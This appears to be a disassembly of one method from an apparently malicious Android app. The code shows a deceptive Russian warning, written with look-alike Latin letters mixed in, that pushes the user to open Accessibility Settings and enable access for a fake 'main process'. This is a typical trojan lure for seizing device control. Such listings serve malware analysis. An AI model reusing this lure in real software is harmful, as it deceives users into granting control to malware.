# Lorg/ceremony/perfect/CoinFoundation;->onCreate(Landroid/os/Bundle;)V [access_flags=protected]
#
# Parameters:
# - local registers: v0...v3
# - v4:android.os.Bundle
#
# - return:void

onCreate-BB@0x0 : 
	0       (00000000) invoke-super         v3, v4, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
	1       (00000006) invoke-virtual       v3, Lorg/ceremony/perfect/CoinFoundation;->getApplicationContext()Landroid/content/Context;
	2       (0000000c) move-result-object   v0
	3       (0000000e) const-string         v1, "Сиcтемa не кoррeктнo рaботaет, вaм необходимо включить дocтуп к cтатиcтикe для 'Оcнoвнoй прoцeсc'"
	4       (00000012) const/4              v2, 1
	5       (00000014) invoke-static        v0, v1, v2, Landroid/widget/Toast;->makeText(Landroid/content/Context; Ljava/lang/CharSequence; I)Landroid/widget/Toast;
	6       (0000001a) move-result-object   v0
	7       (0000001c) invoke-virtual       v0, Landroid/widget/Toast;->show()V
	8       (00000022) new-instance         v0, Landroid/content/Intent;
	9       (00000026) const-string         v1, 'android.settings.ACCESSIBILITY_SETTINGS'
	10      (0000002a) invoke-direct        v0, v1, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
	11      (00000030) const/high16         v1, 4096 # [2.524354896707238e-29]
	12      (00000034) invoke-virtual       v0, v1, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
	13      (0000003a) invoke-virtual       v3, v0, Lorg/ceremony/perfect/CoinFoundation;->startActivity(Landroid/content/Intent;)V
	14      (00000040) invoke-virtual       v3, Lorg/ceremony/perfect/CoinFoundation;->finish()V
	15      (00000046) return-void          

